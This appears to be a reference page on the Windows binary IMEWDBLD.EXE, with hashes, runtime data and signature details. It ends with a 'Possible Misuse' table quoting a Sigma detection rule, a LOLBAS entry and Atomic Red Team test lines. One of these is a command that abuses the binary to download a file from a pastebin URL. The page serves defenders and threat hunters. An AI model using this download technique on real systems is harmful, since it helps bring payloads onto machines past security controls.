IMEWDBLD.EXE

  • File Path: C:\Windows\system32\IME\shared\IMEWDBLD.EXE
  • Description: Microsoft IME Open Extended Dictionary Module

Screenshot

IMEWDBLD.EXE

Hashes

Type Hash
MD5 8B8C8F73B4E96963DD9A6E760C5F77DD
SHA1 71F3B5DA45334B704E5B738F442A5997A9EEC19E
SHA256 51E8741641C33D13908F3260BEE589871D5EFD9210504F7B4CDEEE50BAE17C2C
SHA384 3D57C2A6F93AB54849FC755C705B655C2B2F75D38B7DCEE95B5683751795FDB2C51890E677A7A376C3D90E153A4DB374
SHA512 31C97E1B37727CB5E1208CB468A4DF2BB9C1CBD7B31443B32BA4C0028DD221C386DEBF745639C4094C4C428E0D382145050F77D46A42EB399BC0FBF6CB366504
SSDEEP 6144:wDVtT8kSl4FnvSGrwuTUJD3PAfjHPPnsFGUPg7Gs/UEVTppNX+:wBd89iFaGrwuTiAfbaXPg7Gs/r
IMP 5D2E928CFCDF45D4BEE31908ADE49B06
PESHA1 941B69469AB7711F9796AE1957DD3D5C766C724C
PE256 6CB60099DCEC6173E073A4FB505036B9A05E0FEE733CC76BEB57949FBD793E38

Runtime Data

Window Title:

Microsoft IME Open Extended Dictionary Error

Open Handles:

Path Type
(R-D) C:\Windows\Fonts\StaticCache.dat File
(R-D) C:\Windows\System32\en-US\imageres.dll.mui File
(RW-) C:\Users\user File
(RW-) C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.1518_none_de6e2bd0534e2567 File
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000004.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000004.db Section
\BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2.ro Section
\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0 Section
\BaseNamedObjects\NLS_CodePage_437_3_2_0_0 Section
\Sessions\2\Windows\Theme2131664586 Section
\Windows\Theme966197582 Section

Loaded Modules:

Path
C:\Windows\System32\ADVAPI32.dll
C:\Windows\System32\bcryptPrimitives.dll
C:\Windows\SYSTEM32\Cabinet.dll
C:\Windows\System32\cfgmgr32.dll
C:\Windows\System32\combase.dll
C:\Windows\System32\CRYPT32.dll
C:\Windows\System32\cryptsp.dll
C:\Windows\System32\GDI32.dll
C:\Windows\System32\gdi32full.dll
C:\Windows\system32\IME\shared\IMEWDBLD.EXE
C:\Windows\System32\kernel.appcore.dll
C:\Windows\System32\KERNEL32.DLL
C:\Windows\System32\KERNELBASE.dll
C:\Windows\System32\MSASN1.dll
C:\Windows\System32\msvcp_win.dll
C:\Windows\System32\msvcrt.dll
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\System32\ole32.dll
C:\Windows\System32\OLEAUT32.dll
C:\Windows\System32\powrprof.dll
C:\Windows\System32\profapi.dll
C:\Windows\System32\RPCRT4.dll
C:\Windows\System32\sechost.dll
C:\Windows\System32\shcore.dll
C:\Windows\System32\SHELL32.dll
C:\Windows\System32\shlwapi.dll
C:\Windows\System32\ucrtbase.dll
C:\Windows\System32\USER32.dll
C:\Windows\SYSTEM32\UxTheme.dll
C:\Windows\System32\win32u.dll
C:\Windows\System32\windows.storage.dll
C:\Windows\System32\WINTRUST.dll
C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17763.1518_none_de6e2bd0534e2567\COMCTL32.dll

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: imewdbld.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.17763.1075 (WinBuild.160101.0800)
  • Product Version: 10.0.17763.1075
  • Language: Language Neutral
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: 0/72
  • VirusTotal Link: https://www.virustotal.com/gui/file/51e8741641c33d13908f3260bee589871d5efd9210504f7b4cdeee50bae17c2c/detection/

File Similarity (ssdeep match)

File Score
C:\WINDOWS\system32\IME\SHARED\IMEWDBLD.EXE 33
C:\WINDOWS\system32\IME\SHARED\IMEWDBLD.EXE 43
C:\Windows\system32\IME\SHARED\IMEWDBLD.EXE 38
C:\Windows\SysWOW64\IME\shared\IMEWDBLD.EXE 36
C:\WINDOWS\SysWOW64\IME\SHARED\IMEWDBLD.EXE 35
C:\Windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE 32
C:\windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE 32
C:\Windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE 32
C:\WINDOWS\SysWOW64\IME\SHARED\IMEWDBLD.EXE 33

Possible Misuse

The following table contains possible examples of IMEWDBLD.EXE being misused. While IMEWDBLD.EXE is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma net_connection_win_imewdbld.yml title: Download a File with IMEWDBLD.exe DRL 1.0
sigma net_connection_win_imewdbld.yml description: Use IMEWDBLD.exe (built-in to windows) to download a file DRL 1.0
sigma net_connection_win_imewdbld.yml Image\|endswith: '\IMEWDBLD.exe' DRL 1.0
LOLBAS IMEWDBLD.yml Name: IMEWDBLD.exe  
LOLBAS IMEWDBLD.yml - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw  
LOLBAS IMEWDBLD.yml Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>  
LOLBAS IMEWDBLD.yml - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe  
atomic-red-team index.md - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team windows-index.md - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] MIT License. © 2018 Red Canary
atomic-red-team T1105.md - Atomic Test #17 - Download a file with IMEWDBLD.exe MIT License. © 2018 Red Canary
atomic-red-team T1105.md ## Atomic Test #17 - Download a file with IMEWDBLD.exe MIT License. © 2018 Red Canary
atomic-red-team T1105.md Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file. MIT License. © 2018 Red Canary
atomic-red-team T1105.md $imewdbled = $env:SystemRoot + “\System32\IME\SHARED\IMEWDBLD.exe” MIT License. © 2018 Red Canary

MIT License. Copyright (c) 2020-2021 Strontic.